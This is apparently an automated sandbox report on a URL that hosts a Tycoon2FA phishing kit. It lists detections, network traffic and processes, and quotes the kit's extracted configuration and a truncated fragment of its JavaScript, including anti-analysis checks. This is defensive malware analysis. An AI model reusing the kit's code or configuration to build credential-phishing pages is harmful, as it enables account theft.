Edit tour

Windows Analysis Report
https://8734873478934795494.z9.web.core.windows.net/

Overview

General Information

Sample URL:https://8734873478934795494.z9.web.core.windows.net/
Analysis ID:1675923
Infos:

Detection

Tycoon2FA
Score:88
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Yara detected AntiDebug via timestamp check
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
HTML page contains suspicious base64 encoded javascript
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 6792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6220 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1992,i,1766977642034281986,6040091547616364707,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2020 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 3308 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1992,i,1766977642034281986,6040091547616364707,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5096 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://8734873478934795494.z9.web.core.windows.net/" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
{
  "otherweburl": "",
  "websitenames": "[\"godaddy\",\"okta\"]",
  "bes": "[\"Apple.com\",\"Netflix.com\"]",
  "pes": "[\"https:\\/\\/t.me\\/\",\"https:\\/\\/t.com\\/\",\"t.me\\/\",\"https:\\/\\/t.me.com\\/\",\"t.me.com\\/\",\"t.me@\",\"https:\\/\\/t.me@\",\"https:\\/\\/t.me\",\"https:\\/\\/t.com\",\"t.me\",\"https:\\/\\/t.me.com\",\"t.me.com\",\"t.me\\/@\",\"https:\\/\\/t.me\\/@\",\"https:\\/\\/t.me@\\/\",\"t.me@\\/\",\"https:\\/\\/www.telegram.me\\/\",\"https:\\/\\/www.telegram.me\"]",
  "capnum": "1",
  "appnum": "1",
  "pvn": "0",
  "view": "",
  "pagelinkval": "NANzw",
  "emailcheck": "window.location.search.substring(1)"
}
SourceRuleDescriptionAuthorStrings
0.1.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
    0.5..script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      0.5..script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
        0.7.d.script.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
          0.0.pages.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://8734873478934795494.z9.web.core.windows.net/Avira URL Cloud: detection malicious, Label: phishing
            Source: 0.7.d.script.csvMalware Configuration Extractor: Tycoon2FA {"otherweburl": "", "websitenames": "[\"godaddy\",\"okta\"]", "bes": "[\"Apple.com\",\"Netflix.com\"]", "pes": "[\"https:\\/\\/t.me\\/\",\"https:\\/\\/t.com\\/\",\"t.me\\/\",\"https:\\/\\/t.me.com\\/\",\"t.me.com\\/\",\"t.me@\",\"https:\\/\\/t.me@\",\"https:\\/\\/t.me\",\"https:\\/\\/t.com\",\"t.me\",\"https:\\/\\/t.me.com\",\"t.me.com\",\"t.me\\/@\",\"https:\\/\\/t.me\\/@\",\"https:\\/\\/t.me@\\/\",\"t.me@\\/\",\"https:\\/\\/www.telegram.me\\/\",\"https:\\/\\/www.telegram.me\"]", "capnum": "1", "appnum": "1", "pvn": "0", "view": "", "pagelinkval": "NANzw", "emailcheck": "window.location.search.substring(1)"}

            Phishing

            barindex
            Source: Yara matchFile source: 0.7.d.script.csv, type: HTML
            Source: Yara matchFile source: 0.5..script.csv, type: HTML
            Source: Yara matchFile source: 0.0.pages.csv, type: HTML
            Source: Yara matchFile source: 0.1.pages.csv, type: HTML
            Source: 0.5..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://8734873478934795494.z9.web.core.windows.ne... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and aggressive DOM manipulation. It checks for the presence of web automation tools, redirects to a blank page, and intercepts various keyboard and clipboard events to prevent common debugging and security analysis actions. Additionally, it includes an interval-based debugger trap that could be used to detect and evade analysis. These behaviors strongly indicate malicious intent, warranting a high-risk score.
            Source: 0.6..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://8734873478934795494.z9.web.core.windows.ne... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `eval()` to execute a decoded string, the potential for sending sensitive user data to external servers, and the presence of heavily obfuscated code all contribute to a high-risk assessment. While the script may have some legitimate functionality, the overall risk profile is concerning and requires further investigation.
            Source: 0.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://8734873478934795494.z9.web.core.windows.ne... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious redirection. The use of `atob` to decode a heavily obfuscated string, which is then executed using `eval`, indicates the potential for malicious code injection. Additionally, the script attempts to detect and bypass security measures like WebDriver and Phantom.js, suggesting an intent to evade detection. The redirection to a third-party domain (bestbuy.com) further raises concerns about the script's purpose. Overall, the combination of these behaviors strongly suggests this is a high-risk, potentially malicious script.
            Source: https://8734873478934795494.z9.web.core.windows.net/HTTP Parser: Base64 decoded: document.write
            Source: https://8734873478934795494.z9.web.core.windows.net/HTTP Parser: Base64 decoded: document.write
            Source: https://8734873478934795494.z9.web.core.windows.net/HTTP Parser: Number of links: 0
            Source: https://8734873478934795494.z9.web.core.windows.net/HTTP Parser: <input type="password" .../> found but no <form action="...
            Source: https://8734873478934795494.z9.web.core.windows.net/HTTP Parser: Title: Proceed For Secure Account Access does not match URL
            Source: https://8734873478934795494.z9.web.core.windows.net/HTTP Parser: var otherweburl = "";var websitenames = ["godaddy","okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "nanzw";var emailcheck = window.location.search.substring(1);function isbase64(str) { try { return btoa(atob(str)) === str; } catch (e) { return false; }}if (isbase64(emailcheck)) { emailcheck = atob(emailcheck);}var webname = "rtrim(/web8/, '/')";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "https://www.irs.gov/pub/irs-pdf/f1040.pdf";var useragent = navigator.useragent;var browsername;var userip;var ...
            Source: https://8734873478934795494.z9.web.core.windows.net/HTTP Parser: <input type="password" .../> found
            Source: https://8734873478934795494.z9.web.core.windows.net/HTTP Parser: No favicon
            Source: https://8734873478934795494.z9.web.core.windows.net/HTTP Parser: No favicon
            Source: https://8734873478934795494.z9.web.core.windows.net/HTTP Parser: No <meta name="author".. found
            Source: https://8734873478934795494.z9.web.core.windows.net/HTTP Parser: No <meta name="author".. found
            Source: https://8734873478934795494.z9.web.core.windows.net/HTTP Parser: No <meta name="copyright".. found
            Source: https://8734873478934795494.z9.web.core.windows.net/HTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 192.178.49.196:443 -> 192.168.2.5:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 150.171.28.254:443 -> 192.168.2.5:49731 version: TLS 1.2
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 192.178.49.195
            Source: unknownTCP traffic detected without corresponding DNS query: 192.178.49.195
            Source: unknownTCP traffic detected without corresponding DNS query: 192.178.49.195
            Source: unknownTCP traffic detected without corresponding DNS query: 192.178.49.195
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
            Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.254
            Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.254
            Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.254
            Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.254
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 192.178.49.195
            Source: unknownTCP traffic detected without corresponding DNS query: 192.178.49.195
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://8734873478934795494.z9.web.core.windows.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://8734873478934795494.z9.web.core.windows.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://8734873478934795494.z9.web.core.windows.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250428%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250428T043316Z&X-Amz-Expires=300&X-Amz-Signature=8fe791c6996e8d5e875950a19d9b3faaa40e1be3463695fd29b4215c33745969&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://8734873478934795494.z9.web.core.windows.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: code.jquery.com
            Source: global trafficDNS traffic detected: DNS query: github.com
            Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
            Source: chromecache_51.3.drString found in binary or memory: http://github.com/fent/randexp.js/raw/master/LICENSE
            Source: chromecache_49.3.dr, chromecache_58.3.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
            Source: chromecache_51.3.drString found in binary or memory: https://github.com/fent)
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49675
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownHTTPS traffic detected: 192.178.49.196:443 -> 192.168.2.5:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 150.171.28.254:443 -> 192.168.2.5:49731 version: TLS 1.2
            Source: classification engineClassification label: mal88.phis.evad.win@23/36@10/6
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1992,i,1766977642034281986,6040091547616364707,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2020 /prefetch:3
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1992,i,1766977642034281986,6040091547616364707,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5096 /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://8734873478934795494.z9.web.core.windows.net/"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1992,i,1766977642034281986,6040091547616364707,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2020 /prefetch:3Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1992,i,1766977642034281986,6040091547616364707,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5096 /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
            Source: Yara matchFile source: 0.5..script.csv, type: HTML
            Source: Yara matchFile source: 0.0.pages.csv, type: HTML
            Source: Yara matchFile source: 0.1.pages.csv, type: HTML
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Browser Extensions
            1
            Process Injection
            1
            Process Injection
            OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Scripting
            Boot or Logon Initialization Scripts1
            Deobfuscate/Decode Files or Information
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1675923 URL: https://8734873478934795494... Startdate: 28/04/2025 Architecture: WINDOWS Score: 88 24 Found malware configuration 2->24 26 Antivirus / Scanner detection for submitted sample 2->26 28 Yara detected AntiDebug via timestamp check 2->28 30 3 other signatures 2->30 6 chrome.exe 2 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 16 192.168.2.5, 138, 443, 49675 unknown unknown 6->16 11 chrome.exe 6->11         started        14 chrome.exe 6->14         started        process5 dnsIp6 18 www.google.com 192.178.49.196, 443, 49702, 49737 GOOGLEUS United States 11->18 20 github.com 140.82.114.4, 443, 49707 GITHUBUS United States 11->20 22 5 other IPs or domains 11->22

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            https://8734873478934795494.z9.web.core.windows.net/100%Avira URL Cloudphishing
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches

            Download Network PCAP: filteredfull

            NameIPActiveMaliciousAntivirus DetectionReputation
            code.jquery.com
            151.101.2.137
            truefalse
              high
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                high
                github.com
                140.82.114.4
                truefalse
                  high
                  www.google.com
                  192.178.49.196
                  truefalse
                    high
                    s-part-0043.t-0009.t-msedge.net
                    13.107.246.71
                    truefalse
                      high
                      objects.githubusercontent.com
                      185.199.111.133
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://c.pki.goog/r/r4.crlfalse
                          high
                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                            high
                            https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://github.com/fent)chromecache_51.3.drfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                140.82.114.4
                                github.comUnited States
                                36459GITHUBUSfalse
                                192.178.49.196
                                www.google.comUnited States
                                15169GOOGLEUSfalse
                                185.199.111.133
                                objects.githubusercontent.comNetherlands
                                54113FASTLYUSfalse
                                151.101.2.137
                                code.jquery.comUnited States
                                54113FASTLYUSfalse
                                104.17.25.14
                                cdnjs.cloudflare.comUnited States
                                13335CLOUDFLARENETUSfalse
                                IP
                                192.168.2.5
                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1675923
                                Start date and time:2025-04-28 06:33:29 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 4s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:browseurl.jbs
                                Sample URL:https://8734873478934795494.z9.web.core.windows.net/
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:15
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal88.phis.evad.win@23/36@10/6
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 142.250.68.227, 192.178.49.174, 142.250.101.84, 199.232.210.172, 192.178.49.206, 20.60.242.14, 192.178.49.202, 142.250.68.234, 192.178.49.170, 142.250.69.10, 184.29.183.29, 13.107.246.71, 4.245.163.56
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenFile calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: https://8734873478934795494.z9.web.core.windows.net/
                                No simulations
                                No context
                                No context
                                No context
                                No context
                                No context
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                Category:downloaded
                                Size (bytes):673
                                Entropy (8bit):7.6596900876595075
                                Encrypted:false
                                SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                MD5:0E176276362B94279A4492511BFCBD98
                                SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                Malicious:false
                                Reputation:low
                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, ASCII text, with very long lines (63220)
                                Category:downloaded
                                Size (bytes):391039
